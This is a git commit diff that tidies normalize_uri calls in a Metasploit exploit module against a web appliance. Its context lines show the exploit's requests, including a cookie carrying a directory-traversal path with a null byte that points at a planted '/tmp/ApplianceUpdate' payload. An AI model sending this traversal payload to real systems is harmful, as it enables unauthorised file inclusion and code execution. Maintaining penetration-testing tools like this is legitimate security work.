Fix use of normalize_uri
parent
b4fa535f2b
commit
6073e6f2dc
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, "")
|
||||
'uri' => normalize_uri(uri)
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
|
||||
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Cookie' => "lang=fr" },
|
||||
'uri' => normalize_uri(uri, "")
|
||||
'uri' => normalize_uri(uri)
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
|
||||
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
|
||||
'uri' => normalize_uri(uri, "")
|
||||
'uri' => normalize_uri(uri)
|
||||
})
|
||||
|
||||
# If we don't get a 200 when we request our malicious payload, we suspect
|
||||
|
|
Loading…
Reference in New Issue